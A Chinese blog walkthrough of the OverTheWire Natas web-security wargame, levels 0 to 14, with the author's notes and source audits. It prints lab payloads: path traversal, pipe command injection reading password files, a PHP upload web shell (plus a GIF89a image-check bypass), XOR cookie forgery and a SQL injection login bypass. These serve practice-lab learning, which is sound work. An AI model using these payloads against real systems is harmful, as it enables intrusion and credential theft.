Wargames学习笔记--Natas

已于 2022-02-09 23:38:44 修改
阅读量3.7k 收藏
点赞数
文章标签: 安全 web
于 2022-02-09 23:28:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42820274/article/details/122846617
版权

靶场链接:https://overthewire.org/wargames/natas/natas0.html

Level 0


按照题目的提示登录web页面,查看源码里获得下一级密码

Level 0 --> Level 1


登录natas1
提示禁用了右键,浏览器里选开发者选项查源码就可以了

Level 1 --> Level 2


登录natas2
页面写什么都没有,看了请求头之类的,确实什么都没有,发现源码里有一个奇怪的地方 

<img src="files/pixel.png">

显示这个web有一个目录/files,访问files目录后里面除了pixel.png还有一个文本里面有下一级密码

[PARENTDIR]	Parent Directory	 	-	 
[IMG]	pixel.png	2016-12-15 16:07	303	 
[TXT]	users.txt	2016-12-20 05:15	145

Level 2 --> Level 3


登录natas3
源码中提示 

<!-- No more information leaks!! Not even Google will find it this time... -->

谷歌都找不到,意味着限制爬虫的robots.txt中有内容
访问http://natas3.natas.labs.overthewire.org/robots.txt
回显了一个目录,访问目录里面就有下一级密码

http://natas3.natas.labs.overthewire.org//s3cr3t/

[PARENTDIR]	Parent Directory	 	-	 
[TXT]	users.txt	2016-12-20 05:15	40

Level 3 --> Level 4


登录natas4
提示很明显 

You are visiting from "" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/"

需要改请求头的Referer参数为http://natas5.natas.labs.overthewire.org/
使用burpsuit完成即可获得密码

Level 4 --> Level 5


登录natas5
提示 Access disallowed. You are not logged in
继续用burpsuit,发现cookie里有一项 loggedin=0这里改成1提交就可以获得下一级密码

Level 5 --> Level 6


登录natas6
页面有显示源码按钮,看到提示的源码 

<?

include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
    }
?>

如果输入的内容和已有的serect内容一致就会返回natas7的密码,看到包涵了一个文件secret.inc,直接访问这个文件就会发现serect的实际内容,提交即可

Level 6 --> Level 7


登录natas7
有两个按钮,触发后看到链接的变化 

http://natas7.natas.labs.overthewire.org/index.php?page=home
http://natas7.natas.labs.overthewire.org/index.php?page=about

源码里有提示

<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->

构造路径穿越就可以访问到natas8的密码

http://natas7.natas.labs.overthewire.org/index.php?page=../../../../../etc/natas_webpass/natas8

Level 7 --> Level 8


登录natas8
还是源码审计 

<?
$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
    print "Access granted. The password for natas9 is <censored>";
    } else {
    print "Wrong secret";
    }
}
?>

就是把endodedSecret的内容按照顺序执行 hex2bin --> strrev --> base64_decode就可以获得secret来提交获得密码

<?
$encodedSecret = "3d3d516343746d4d6d6c315669563362";

echo base64_decode(strrev(hex2bin($encodedSecret)))
?>

Level 8 --> Level 9


登录natas9
继续源码审计 

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>

就是把用户输入的内容执行了grep -i $key dictionary.txt
这里可以用到分割符“|”来进行额外的命令执行,构造内容直接获取密码

asdasda | cat /etc/natas_webpass/natas10

Level 9 --> Level 10


登录natas10
源码审计 

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>

和上一题很相似,只是过滤了一部分命令分隔符,但是grep本身也具有读取文本的功能,构造内容读取密码

[A-Z][a-z] /etc/natas_webpass/natas11

Level 10 --> Level 11


登录natas11用户
代码审计老长了 

<?

$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
    $key = '<censored>';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
    $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}

function loadData($def) {
    global $_COOKIE;
    $mydata = $def;
    if(array_key_exists("data", $_COOKIE)) {
    $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
    if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
        if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
        $mydata['showpassword'] = $tempdata['showpassword'];
        $mydata['bgcolor'] = $tempdata['bgcolor'];
        }
    }
    }
    return $mydata;
}

function saveData($d) {
    setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
}

$data = loadData($defaultdata);

if(array_key_exists("bgcolor",$_REQUEST)) {
    if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
        $data['bgcolor'] = $_REQUEST['bgcolor'];
    }
}

saveData($data);
?>

首先这里终极目标是把“showpassword”的值改为“yes”
xor_encrypt()是一个异或算法,其中key的值未知
loadData()是读取cookie更新data值的一个函数
saveData()是一个将data值转换为cookie的函数
先由data xor key得到cookie可知,用data xor cookie可以求得key,cookie的值可以用浏览器,burpsuit、charles等等方法看到
稍稍修改一下xor_encrypt()即可

<?php
$cookie='ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw=';

$decode_cookie = base64_decode($cookie);

function xor_encrypt($in) {
    $defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");
    $key = json_encode($defaultdata);
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
    $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}

$s_key = xor_encrypt($decode_cookie);

echo $s_key
?>

执行得到key为qw8J
得到key以后就需要把defaultdata中“showpassword”的值改为“yes”重新生成cookie,利用远程序稍加修改即可实现

<?php

$defaultdata = array( "showpassword"=>"yes", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
    $key = 'qw8J';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
    $outText .= $text[$i] ^ $key[$i % strlen($key)]; //把传入的内容和key按位异或
    }

    return $outText;
}

function saveData($d) { 
    echo (base64_encode(xor_encrypt(json_encode($d))));
}

$my_cookie = saveData($defaultdata);

echo $my_cookie

?>

最后把重构好的cookie在打开页面的时候用burpsuit拦截替换data=后面的值后转发得到下一级密码
在这里插入图片描述

Level 11 --> Level 12


登录natas12用户
还是代码审计,有一个上传功能 

<? 

function genRandomString() {
    $length = 10;
    $characters = "0123456789abcdefghijklmnopqrstuvwxyz";
    $string = "";    

    for ($p = 0; $p < $length; $p++) {
        $string .= $characters[mt_rand(0, strlen($characters)-1)];
    }

    return $string;
}

function makeRandomPath($dir, $ext) {
    do {
    $path = $dir."/".genRandomString().".".$ext;
    } while(file_exists($path));
    return $path;
}

function makeRandomPathFromFilename($dir, $fn) {
    $ext = pathinfo($fn, PATHINFO_EXTENSION);
    return makeRandomPath($dir, $ext);
}

if(array_key_exists("filename", $_POST)) {
    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);


        if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
        echo "File is too big";
    } else {
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
            echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
        } else{
            echo "There was an error uploading the file, please try again!";
        }
    }
} else {
?>

看了半天其实就是随机了文件名,对扩展名和内容都没有审计,直接用php查看/etc/natas_webpass/natas13,用返回的上传路径连接去查看就可以了。。。

<?php
    $a = system('cat /etc/natas_webpass/natas13');echo $a;
?>

Level 12 --> Level 13


登录natas13用户
和上一题源码很像 

<? 

function genRandomString() {
    $length = 10;
    $characters = "0123456789abcdefghijklmnopqrstuvwxyz";
    $string = "";    

    for ($p = 0; $p < $length; $p++) {
        $string .= $characters[mt_rand(0, strlen($characters)-1)];
    }

    return $string;
}

function makeRandomPath($dir, $ext) {
    do {
    $path = $dir."/".genRandomString().".".$ext;
    } while(file_exists($path));
    return $path;
}

function makeRandomPathFromFilename($dir, $fn) {
    $ext = pathinfo($fn, PATHINFO_EXTENSION);
    return makeRandomPath($dir, $ext);
}

if(array_key_exists("filename", $_POST)) {
    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);
    
    $err=$_FILES['uploadedfile']['error'];
    if($err){
        if($err === 2){
            echo "The uploaded file exceeds MAX_FILE_SIZE";
        } else{
            echo "Something went wrong :/";
        }
    } else if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
        echo "File is too big";
    } else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
        echo "File is not an image";
    } else {
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
            echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
        } else{
            echo "There was an error uploading the file, please try again!";
        }
    }
} else {
?>

这里的关键函数是exif_imagetype()

exif_imagetype() 读取一个图像的第一个字节并检查其签名

所以我们在上一题的代码前面加上图像的识别头GIF89a?即可

GIF89a?<?php
    $a = system('cat /etc/natas_webpass/natas14');echo $a;
?>

Level 13 --> Level 14


登录natas14用户
代码审计 

<?
if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas14', '<censored>');
    mysql_select_db('natas14', $link);
    
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    if(mysql_num_rows(mysql_query($query, $link)) > 0) {
            echo "Successful login! The password for natas15 is <censored><br>";
    } else {
            echo "Access denied!<br>";
    }
    mysql_close($link);
} else {
?>

输入用户名和密码没有任何过滤,而且有一个get的参数debug可以看到执行的语句非常和谐,构造一个payload看看回显

http://natas14.natas.labs.overthewire.org/?username=1&password=1&debug=1

回显

Executing query: SELECT * from users where username="1" and password="1"
Access denied!

这里只要用一个"来闭合用户名用or构造一个永真的值然后用#结尾即可
构造后的username为1" or 1#,password那部分可以为空。提交即可获得下一级密码

Level 14 --> Level 15


因数据库水平有限,笔记待更

Zhaohg720
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
natas(21-27)
半夜好饿的博客
08-19 443
natas21: 本关有两个页面,一个和之前的相同,显示“You are logged in as a regular user. Login as an admin to retrieve credentials for natas22.”,另一个好像是一个修改CSS的页面,查看第一个页面的源码,会发现和前一关相似,都是需要_SESSION[“admin”]==1才可看到下一级的密码。 加上第...
170822 WarGames-Natas(27-28)
whklhhhh的博客
08-22 727
1625-5 王子昂 总结《2017年8月22日》 【连续第323天总结】 A. Natas B.Level 27按照之前sql注入的尿性,username应该是natas28,试一下回复Wrong password确认无误 本来以为是宽字节注入,绕过mysql_real_escape_string()函数 原理是该函数对单引号等字符自动进行转义,在前边添加’\’ 单引号字符为0x27
Writeups of OverthewireWargames(natas)
weixin_33858485的博客
04-06 384
Link to Natas: overthewire.org/wargames/na… Level 0 Password is given directly in the question's page: Username: natas0 Password: natas0 复制代码Level 1 View the html source and notice this line: <!--T...
natas
02-23
win2000下的用raw socket对IP数据包监听分析的程序
Wargames靶场之natas(web安全)
weixin_50764099的博客
04-24 800
Natas系列包含服务器端Web安全的基础知识。每个级别的 natas 都由位于处的自己的网站组成,其中 X 是级别 数。。要访问某个级别,请输入用户名 对于该级别(例如,NATAS0 表示级别 0)及其密码。每个级别都可以访问下一级的密码。你的任务是以某种方式获取下一个密码并升级。。例如,存储 natas5 的密码 在文件 /etc/natas_webpass/natas5 中,只有 natas4 和 纳塔斯5。
wargame-Natas(1-20)
weixin_43220691的博客
11-30 2432
wargame-natas write up
WarGames-Natas(16)
whklhhhh的博客
08-18 515
natas(16)<? $key = "";if(array_key_exists("needle", $_REQUEST)) { $key = $_REQUEST["needle"]; }if($key != "") { if(preg_match('/[;|&`\'"]/',$key)) { print "Input contains an illegal cha
Python库 | natas-1.0.2.tar.gz
03-06
《Python库natas-1.0.2:深入探索与应用》 在IT行业中,Python是一种广泛使用的开发语言,尤其在后端开发领域,它的简洁语法和强大的库支持使其成为...所以,不妨下载natas-1.0.2.tar.gz,开启你的Web安全学习之旅吧!
Natas-Solutions:试图解决纳塔斯问题
03-31
Natas-Solutions-master这个压缩包很可能是包含了所有Natas挑战的解答和代码实现,对学习和复习这些知识点提供了宝贵的资源。通过深入研究和实践,你可以逐步建立起牢固的Web安全基础,并为应对更复杂的安全挑战做好...
pentest-notes
05-25
渗透测试笔记工具的最常用用法sqlmap sqlmap --url =“” -p用户名--user-agent = SQLMAP --random-agent --threads = 10 --risk = 3 --level = 5 --eta --dbms = MySQL --os = Linux --banner --is-dba --users --...
natas:overthewire 战争游戏 natas 的解决方案集合
06-10
"Natas-master"压缩包文件可能包含了一个Natas游戏解决方案的完整集合,包括了各个级别的解题思路和代码示例。玩家可以参考这些资源,结合自己的实践,加深对Web安全的理解。 总之,Natas游戏提供了一个理想的环境...
natas:纳塔斯兵棋推演
06-04
我看过一些 natas 的文章,但他们都使用 python 来解决挑战。 在玩这个游戏的过程中,我写了一些shellcode而不是python来解决许多更高层次的问题。 在这里,我将向您展示 shellcode 的强大功能, curl命令的魔力。 ...
170816 WarGames-Natas(0-14)
whklhhhh的博客
08-16 480
1625-5 王子昂 总结《2017年8月16日》 【连续第318天总结】 A. WarGames-Natas B.Level 0这次是网页题目了 啥都没有,提示在本页面 基础题先看源代码╮(╯_╰)╭ <!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto -->轻松找到Level 1还是在源代码里,这次右击不允许
natas(0-10)
半夜好饿的博客
08-15 568
写在前面的话:是的,我又开新坑了,虽然我sqli-lab的wp还有很多没写,关卡也还没闯完,但这不妨碍我开新坑,对不对!natas具体不介绍了,可以自行百度,我真的很懒的,直接写wp吧。 natas0: 要求在本页面找到下一关的密码,首先查看源码,然后就看到了密码了。 natas1: 还是要求本页找到下一关的密码,但是右击查看原码被锁了,那就快捷键呗。 natas2:   查看源码,只能看到本关的...
natas(11-20)
半夜好饿的博客
08-18 992
natas11: 同样查看源码,审计。想要得到密码,需要使showpassword设置为yes,loadData函数是将cookie的值解密还原,存储与mydata数组中,并返回mydata。而savaData函数则是将传入的参数进行编码处理,存在COOKIE[“data”]中。 由此大体思路为,构造新的输入参数,是的showpassword值设置为yes,编码后得到新的data值。但完成这步,需...
网络空间安全——Wargame靶场(Natas)
weixin_44717952的博客
05-20 1169
访问的网站才能看到密码”,在 http 的 refer 字段中表明来源,所以我们需要修改这个字段的值为上面的网址。拦截浏览器发送的请求,修改 refer 字段中的值为上述网址,然后点击 Forward,即可看到密码。爬虫在收集网页信息时,首先查看该网页的 robot.txt 文件,从中获取可以爬取的内容信息。右键->查看网页源代码,发现什么都没有,但是这时候一行字引起我们的注意,Google 都找不到这个网站。我们可以看到 /s3cr3t/ 文件夹,在浏览器中打开它,我们就可以看到密码了。
170820 WarGames-Natas(21-25)
whklhhhh的博客
08-19 437
Level 21这次本网页没有任何内容,只有session[admin]的检测 不过给了另外一个网页,关键脚本如下// if update was submitted, store it if(array_key_exists("submit", $_REQUEST)) { foreach($_REQUEST as $key => $val) { $_SESSION[$key
Natas 幽灵王病毒分析
ba_wang_mao的专栏
10-10 3573
9E80:0000 0E PUSH CS 9E80:0001 1F POP DS 9E80:0002 E89400 CALL 0099 ;保存 INT 13/15/21/40 9E80:0005 A27304 MOV [0473],AL ;AL = 0 9E80:0008 A21114 MOV [1411],AL 9E80:000B 8EC0 MOV ES,AX 9E80:000D 5F POP DI 9E80:000E 83EF03 SUB DI,+03 9E80:0011 50 PUSH .
【易捷海购-注册安全分析报告】
最新发布
weixin_46641057的博客
07-05 1233
易捷国际作为中石化易捷旗下专业跨境电商平台,大概是因为和阿里有战略合作层面的关系, 所以在选的不是常见的类似极验、腾讯等滑动拼图类产品, 阿里的产品由于过度重视用户体验, 简单的滑动条特别,模拟器只需要单轴的模拟轨道就可以通过, 说明阿里对轨迹的校验比较宽松,之前的分析显示,阿里主要是靠模拟器识别,如果这道关过了,就没有其它的防护措施了。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的。
natas Level 11-12(常见编码、异或逆推、修改cookie)怎么破解
03-29
Level 11: 1. 登录后,发现页面上有一个输入框,可以输入任意的字符串,然后点击“Submit Query”按钮,就会返回一个加密后的字符串。 2. 查看网页源代码,发现有一段JavaScript代码,其中包含了一个函数`encode...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值